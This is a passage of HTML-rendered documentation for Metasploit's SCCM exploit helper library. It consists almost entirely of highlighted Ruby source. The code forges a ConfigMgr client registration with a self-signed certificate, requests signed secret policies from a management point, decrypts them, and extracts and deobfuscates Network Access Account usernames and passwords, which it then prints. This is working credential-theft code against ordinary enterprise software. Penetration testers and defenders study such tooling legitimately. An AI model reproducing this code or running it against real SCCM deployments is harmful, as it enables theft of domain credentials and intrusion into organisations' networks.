<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_sign'>sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA256</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='lbracket'>[</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_creds_from_policy_doc-instance_method">
#<strong>get_creds_from_policy_doc</strong>(policy) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Extract obfuscated credentials from the resulting policy XML document</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 269</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_creds_from_policy_doc'>get_creds_from_policy_doc</span><span class='lparen'>(</span><span class='id identifier rubyid_policy'>policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_policy'>policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_naa_sections'>naa_sections</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>.//instance[@class=&#39;CCM_NetworkAccessAccount&#39;]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_naa_sections'>naa_sections</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_section'>section</span><span class='op'>|</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_section'>section</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>property[@name=&#39;NetworkAccessUsername&#39;]/value</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='id identifier rubyid_username'>username</span> <span class='op'>=</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='rparen'>)</span>
<span class='id identifier rubyid_username'>username</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix!'>delete_suffix!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_section'>section</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>property[@name=&#39;NetworkAccessPassword&#39;]/value</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='id identifier rubyid_password'>password</span> <span class='op'>=</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
<span class='id identifier rubyid_password'>password</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix!'>delete_suffix!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_username'>username</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_password'>password</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='comment'># Deleted credentials seem to result in just an empty value for username and password
</span> <span class='id identifier rubyid_results'>results</span><span class='period'>.</span><span class='id identifier rubyid_append'>append</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_naa_credentials-instance_method">
#<strong>get_naa_credentials</strong>(opts, management_point, site_code, computer_user) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 20</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_naa_credentials'>get_naa_credentials</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_key_and_cert'>generate_key_and_cert</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ConfigMgr Client</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_opts'>http_opts</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rhost</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rport</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>80</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>User-Agent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ConfigMgr Messaging HTTP Sender</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept-Encoding</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>gzip, deflate</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='id identifier rubyid_register_request'>register_request</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_secret_urls'>secret_urls</span> <span class='op'>=</span> <span class='id identifier rubyid_retry_until_truthy'>retry_until_truthy</span><span class='lparen'>(</span><span class='label'>timeout:</span> <span class='int'>30</span><span class='rparen'>)</span> <span class='lbrace'>{</span> <span class='id identifier rubyid_get_secret_policies'>get_secret_policies</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_all_results'>all_results</span> <span class='op'>=</span> <span class='const'>Set</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_secret_urls'>secret_urls</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_url'>url</span><span class='op'>|</span>
<span class='id identifier rubyid_decrypted_policy'>decrypted_policy</span> <span class='op'>=</span> <span class='id identifier rubyid_request_policy'>request_policy</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_url'>url</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_get_creds_from_policy_doc'>get_creds_from_policy_doc</span><span class='lparen'>(</span><span class='id identifier rubyid_decrypted_policy'>decrypted_policy</span><span class='rparen'>)</span>
<span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_results'>results</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No NAA credentials configured</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_all_results'>all_results</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='op'>|</span>
<span class='id identifier rubyid_report_creds'>report_creds</span><span class='lparen'>(</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span> <span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Found valid NAA credentials: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='const'>SocketError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#Unreachable-constant" title="Msf::Module::Failure::Unreachable (constant)">Unreachable</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_secret_policies-instance_method">
#<strong>get_secret_policies</strong>(http_opts, management_point, site_code, key, cert, sms_id, computer_user) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 54</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_secret_policies'>get_secret_policies</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='comma'>,</span> <span class='id identifier rubyid_site_code'>site_code</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_cert'>cert</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_computer_user'>computer_user</span><span class='rparen'>)</span>
<span class='id identifier rubyid_fqdn'>fqdn</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DOMAIN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_hex_pub_key'>hex_pub_key</span> <span class='op'>=</span> <span class='id identifier rubyid_make_ms_pubkey'>make_ms_pubkey</span><span class='lparen'>(</span><span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_guid'>guid</span> <span class='op'>=</span> <span class='const'>SecureRandom</span><span class='period'>.</span><span class='id identifier rubyid_uuid'>uuid</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='id identifier rubyid_sent_time'>sent_time</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_sccm_host'>sccm_host</span> <span class='op'>=</span> <span class='id identifier rubyid_management_point'>management_point</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;RequestAssignments SchemaVersion=\&quot;1.00\&quot; ACK=\&quot;false\&quot; RequestType=\&quot;Always\&quot;&gt;&lt;Identification&gt;&lt;Machine&gt;&lt;ClientID&gt;GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/ClientID&gt;&lt;FQDN&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fqdn'>fqdn</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/FQDN&gt;&lt;NetBIOSName&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/NetBIOSName&gt;&lt;SID /&gt;&lt;/Machine&gt;&lt;User /&gt;&lt;/Identification&gt;&lt;PolicySource&gt;SMS:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_site_code'>site_code</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/PolicySource&gt;&lt;Resource ResourceType=\&quot;Machine\&quot; /&gt;&lt;ServerCookie /&gt;&lt;/RequestAssignments&gt;\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_encode!'>encode!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_body_length'>body_length</span> <span class='op'>=</span> <span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='id identifier rubyid_request_assignments'>request_assignments</span> <span class='op'>=</span> <span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\r\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_compressed'>compressed</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_deflate'>zlib_deflate</span><span class='lparen'>(</span><span class='id identifier rubyid_request_assignments'>request_assignments</span><span class='rparen'>)</span>
<span class='id identifier rubyid_payload_signature'>payload_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_compressed'>compressed</span><span class='rparen'>)</span>
<span class='id identifier rubyid_client_id'>client_id</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GUID:{</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span><span class='embexpr_end'>}</span><span class='tstring_content'>}\x00</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_client_ids_signature'>client_ids_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_client_id'>client_id</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_header'>header</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;Msg ReplyCompression=\&quot;zlib\&quot; SchemaVersion=\&quot;1.1\&quot;&gt;&lt;Body Type=\&quot;ByteRange\&quot; Length=\&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body_length'>body_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>\&quot; Offset=\&quot;0\&quot; /&gt;&lt;CorrelationID&gt;{00000000-0000-0000-0000-000000000000}&lt;/CorrelationID&gt;&lt;Hooks&gt;&lt;Hook2 Name=\&quot;clientauth\&quot;&gt;&lt;Property Name=\&quot;AuthSenderMachine\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;PublicKey\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex_pub_key'>hex_pub_key</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;ClientIDSignature\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_client_ids_signature'>client_ids_signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;PayloadSignature\&quot;&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload_signature'>payload_signature</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/Property&gt;&lt;Property Name=\&quot;ClientCapabilities\&quot;&gt;NonSSL&lt;/Property&gt;&lt;Property Name=\&quot;HashAlgorithm\&quot;&gt;1.2.840.113549.1.1.11&lt;/Property&gt;&lt;/Hook2&gt;&lt;Hook3 Name=\&quot;zlib-compress\&quot; /&gt;&lt;/Hooks&gt;&lt;ID&gt;{</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_guid'>guid</span><span class='embexpr_end'>}</span><span class='tstring_content'>}&lt;/ID&gt;&lt;Payload Type=\&quot;inline\&quot; /&gt;&lt;Priority&gt;0&lt;/Priority&gt;&lt;Protocol&gt;http&lt;/Protocol&gt;&lt;ReplyMode&gt;Sync&lt;/ReplyMode&gt;&lt;ReplyTo&gt;direct:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>:SccmMessaging&lt;/ReplyTo&gt;&lt;SentTime&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sent_time'>sent_time</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SentTime&gt;&lt;SourceID&gt;GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceID&gt;&lt;SourceHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_computer_user'>computer_user</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/SourceHost&gt;&lt;TargetAddress&gt;mp:MP_PolicyManager&lt;/TargetAddress&gt;&lt;TargetEndpoint&gt;MP_PolicyManager&lt;/TargetEndpoint&gt;&lt;TargetHost&gt;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sccm_host'>sccm_host</span><span class='embexpr_end'>}</span><span class='tstring_content'>&lt;/TargetHost&gt;&lt;Timeout&gt;60000&lt;/Timeout&gt;&lt;/Msg&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_bound'>bound</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aAbBcCdDv1234567890VxXyYzZ</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\ufeff</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_header'>header</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain; charset=UTF-16</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_add_part'>add_part</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed'>compressed</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>application/octet-stream</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>binary</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>/ccm_system/request</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CCM_POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Type</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multipart/mixed; boundary=&quot;aAbBcCdDv1234567890VxXyYzZ&quot;</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='op'>&amp;.</span><span class='id identifier rubyid_content'>content</span>
